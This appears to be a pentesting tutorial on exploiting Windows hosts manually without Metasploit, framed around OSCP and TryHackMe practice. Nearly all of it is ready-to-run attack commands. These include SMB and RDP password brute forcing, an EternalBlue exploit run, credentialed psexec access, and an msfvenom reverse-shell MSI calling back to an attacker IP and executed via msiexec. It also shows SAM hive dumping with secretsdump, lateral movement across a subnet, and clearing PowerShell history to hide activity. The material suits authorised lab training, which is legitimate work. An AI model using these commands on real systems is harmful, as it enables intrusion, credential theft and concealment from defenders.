Manual Exploitation – Windows Edition
Not every engagement gives you the luxury of using Metasploit. Whether you’re sharpening your skills for OSCP or working around security controls, mastering manual Windows exploitation is a must.
This guide walks you through how to compromise Windows targets without Metasploit, covering enumeration, exploitation, privilege escalation, and post-exploitation — step by step.
Table of Contents
- Why Manual Windows Exploitation?
- Recon & Enumeration
- Common Exploitable Windows Services
- Gaining a Foothold
- Windows Privilege Escalation
- Post-Exploitation
- TryHackMe Rooms for Practice
- Final Thoughts
Why Manual Windows Exploitation?
- Certification requirements (OSCP, CRTP)
- Bypass detection — no framework = less noise
- Better learning — you’ll understand each moving part
- Adaptability — tailor exploits to custom scenarios
Recon & Enumeration
Nmap First
nmap -sC -sV -p- -oN win_full_scan.txt 10.10.10.10
Windows-Specific Ports to Investigate
| Port | Service | Tool Suggestions |
|---|---|---|
| 139,445 | SMB | smbclient, enum4linux, rpcclient, crackmapexec |
| 3389 | RDP | ncrack, rdesktop, xfreerdp |
| 5985 | WinRM | evil-winrm |
| 135 | RPC | rpcclient, impacket |
| 80/443 | Web | nikto, gobuster, manual crawling |
Common Exploitable Windows Services
SMB Enumeration
Null Sessions:
smbclient -L //10.10.10.10/ -N
Manual Authenticated Access:
smbclient //10.10.10.10/Users -U user
List Shares with Enum4linux:
enum4linux -a 10.10.10.10
CrackMapExec for Cred Testing:
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt
Web Servers
Treat it like Linux web apps. Look for:
- Upload forms
- Command injection
- LFI/RFI
- Outdated CMS
Use:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
If you find an upload form:
- Try
.aspxwebshells - Check for file extension filters
RDP Enumeration
If port 3389 is open:
xfreerdp /u:Administrator /p:pass /v:10.10.10.10
For brute force:
ncrack -p 3389 -U users.txt -P rockyou.txt 10.10.10.10
WinRM Exploitation
Once you get valid credentials:
evil-winrm -i 10.10.10.10 -u administrator -p 'Password123'
Note: Evil-WinRM is essential for post-exploitation. It lets you upload files, run PowerShell, and escalate privileges.
Gaining a Foothold Without Metasploit
Exploit MS17-010 (EternalBlue) Manually
Use nmap to confirm:
nmap -p445 --script smb-vuln-ms17-010 10.10.10.10
If vulnerable, try:
https://github.com/3ndG4me/AutoBlue-MS17-010
Or use:
python3 eternalblue_exploit7.py 10.10.10.10 shellcode.bin
PSExec (Manual)
With valid creds:
impacket-psexec user:password@10.10.10.10
Alternative:
smbexec.py domain/user:pass@10.10.10.10
Exploit Unquoted Service Paths (if write access)
sc qc UnquotedService
Check if the binary path contains spaces and isn’t quoted. Create a malicious .exe in a writable directory in that path.
Windows Privilege Escalation
Once you have a low-priv shell, escalate.
Basic Manual Checks
whoami
hostname
systeminfo
net users
net localgroup administrators
UAC Misconfigurations
whoami /groups
If you’re part of Local Administrators but not elevated:
cmd /c "powershell Start-Process cmd -Verb runAs"
SUID-like Escalation (AlwaysInstallElevated)
Check if this registry setting is vulnerable:
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both are 1, you can create a malicious .msi file:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f msi > shell.msi
Transfer & execute with msiexec:
msiexec /quiet /qn /i C:\Users\user\Downloads\shell.msi
Tools to Upload for Enumeration
Use evil-winrm to upload:
Example:
upload winPEASx64.exe
./winPEASx64.exe
Post-Exploitation
Credential Dumping (Manual)
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
Download and crack offline with:
secretsdump.py -sam sam -system system LOCAL
Password Hunting
Check:
type C:\Users\Administrator\Desktop\notes.txt
dir C:\inetpub\wwwroot\
And of course:
Get-ChildItem -Recurse | Select-String -Pattern "password"
Lateral Movement
If you have creds for other systems:
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123'
Cleanup
Remove uploaded files:
del C:\Users\Public\winPEAS.exe
Clear command history:
Remove-Item (Get-PSReadlineOption).HistorySavePath
TryHackMe Rooms for Practice
Final Thoughts
Manual Windows exploitation requires patience, creativity, and knowledge of how the OS is stitched together. While tools like Metasploit and Cobalt Strike are flashy, the best pentesters understand what’s happening under the hood.
Learn it raw, do it right, and when tools fail — you won’t.